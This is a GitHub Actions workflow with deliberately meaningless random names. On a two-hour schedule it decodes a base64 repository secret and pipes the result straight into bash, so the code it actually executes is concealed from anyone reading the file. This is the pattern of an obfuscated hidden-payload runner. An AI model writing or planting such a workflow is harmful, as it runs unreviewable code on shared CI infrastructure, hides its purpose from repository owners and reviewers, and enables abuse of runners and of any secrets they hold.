name: rmqhhjlqXc
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  nxlzQfnupIl:
    runs-on: ubuntu-22.04
    env:
      sEuAHpnQgiCx: ${{ secrets.PXdUKDJN }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.YuXytGbcvN }}" | base64 -d | bash
